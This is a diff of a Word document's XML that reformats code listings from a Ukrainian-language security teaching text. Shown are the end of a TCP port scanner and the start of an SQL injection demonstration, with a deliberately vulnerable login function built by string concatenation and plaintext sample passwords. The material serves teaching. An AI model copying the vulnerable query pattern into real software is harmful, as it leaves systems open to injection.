+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    };</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#ifdef _WIN32</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    WSADATA wsa;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        return 1;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#endif</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    int found = 0;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    for (int port : ports) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">            ++found;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (found == 0) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#ifdef _WIN32</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    WSACleanup();</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#endif</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return 0;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
     </w:p>
@@ -3364,710 +3467,786 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    const char* schema =</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) VALUES ('admin', 'secret123', 'admin');"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) VALUES ('user1', 'pass1', 'user');";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return db;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
